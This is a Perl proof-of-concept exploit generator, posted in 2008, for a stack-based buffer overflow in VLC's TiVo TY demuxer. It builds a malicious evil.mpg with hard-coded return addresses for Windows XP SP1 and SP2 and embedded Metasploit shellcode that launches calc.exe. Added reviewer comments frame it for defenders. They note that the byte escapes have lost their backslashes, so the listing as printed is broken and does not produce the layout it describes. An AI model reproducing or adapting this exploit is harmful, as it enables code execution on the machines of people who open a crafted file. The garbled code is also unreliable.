
vlc-overflow.txt

Posted on 21 October 2008

#!/usr/bin/perl
# 10/21/2008 k`sOSe
#
# Proof-of-concept generator for a stack-based buffer overflow in VLC's
# TiVo TY demuxer: it writes a single crafted TY container to ./evil.mpg
# whose header fields (i_map_size, SEQ table size, see the field comments
# below) are sized to overrun the demuxer's stack buffer and redirect
# execution to the embedded payload.
#
# Reading notes for defenders / reviewers:
#   - The file starts with the 4-byte TY magic (TIVO_PES_FILEID) even though
#     it is saved with a .mpg extension; a container magic that disagrees
#     with the extension is a cheap triage signal for this sample class.
#   - Only two hard-coded return addresses are provided (Windows XP SP1/SP2,
#     shell32.dll), selected by the single command-line argument.
#   - The embedded payload is the Metasploit "windows/exec" stub that, per
#     its trailing ASCII bytes, launches C:\WINDOWS\system32\calc.exe.
#   - NOTE(review): in this copy every byte-escape has lost its backslash
#     ("x41" instead of an escape sequence), as has the argument regex, so
#     the listing is illustrative only and does not produce the byte layout
#     the field comments describe. Treat it as a read-only reference.
#   - NOTE(review): !defined(@ARGV) on an array is deprecated in modern
#     perl and the 2-arg open() of evil.mpg is unchecked; both are left as
#     written here.
use warnings;
use strict;
# windows/exec - 141 bytes
# http://www.metasploit.com
my $shellcode =
"xfcxe8x44x00x00x00x8bx45x3cx8bx7cx05x78x01" .
"xefx8bx4fx18x8bx5fx20x01xebx49x8bx34x8bx01" .
"xeex31xc0x99xacx84xc0x74x07xc1xcax0dx01xc2" .
"xebxf4x3bx54x24x04x75xe5x8bx5fx24x01xebx66" .
"x8bx0cx4bx8bx5fx1cx01xebx8bx1cx8bx01xebx89" .
"x5cx24x04xc3x5fx31xf6x60x56x64x8bx46x30x8b" .
"x40x0cx8bx70x1cxadx8bx68x08x89xf8x83xc0x6a" .
"x50x68xf0x8ax04x5fx68x98xfex8ax0ex57xffxe7" .
"x43x3ax5cx57x49x4ex44x4fx57x53x5cx73x79x73" .   # ASCII "C:\WINDOWS\sys"
"x74x65x6dx33x32x5cx63x61x6cx63x2ex65x78x65" .   # ASCII "tem32\calc.exe"
"x00";
# Target index must be a single digit in 0..1; anything else prints usage.
usage() if(!defined(@ARGV) or scalar(@ARGV) < 1 or $ARGV[0] !~ /^d$/ or $ARGV[0] > 1);
# Per-target return address overwriting the saved EIP (little-endian).
my @targets = (
    "x24x11x62x77", # jmp esp @ shell32.dll - Win XP SP1
    "xb3x57x04x7d"  # jmp esp @ shell32.dll - Win XP SP2
);
# Filler byte used for every padding run below.
my $junk = "x41";
# Output is always written to the current directory; open() is unchecked.
open(my $file, "> evil.mpg");
# TY container layout: fixed header, then an oversized map / SEQ table that
# overruns the demuxer's stack buffer, the return address, the payload, and
# enough padding to reach the record headers the parser expects next.
print $file "xF5x46x7AxBD" . # TIVO_PES_FILEID
"x00x00x00x02" .
"x00x02x00x00" . # CHUNK_SIZE
$junk x 8 .
"x00x00x05x41" . # i_map_size
$junk x 4 .
"x00x00x05x49" . # SEQ table size / (i_map_size + 8) == 1
$junk x 60 .
$targets[$ARGV[0]] .
$shellcode .
$junk x 130835 .   # presumably pads the chunk out to 0x20000 bytes -- confirm
"x05" . # i_num_recs
$junk x 3 .
"x05" . # p_hdrs
$junk x 1 .
"x09" . # subrec_type
# (subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo)
"xc0" . # rec_type /
$junk x 14 .
"x06" . # subrec_type
# (subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo
"xe0" . # rec_type /
$junk x 531062;
# Prints the usage banner to STDOUT and exits; called on any bad argument.
sub usage {
print <<EOM;
VLC Media Player TY File Stack Based Buffer Overflow Exploit
k`sOSe - 10/21/2008
usage: $0 <target>
targets:
0 - Windows XP SP1
1 - Windows XP SP2
EOM
exit;
}

 
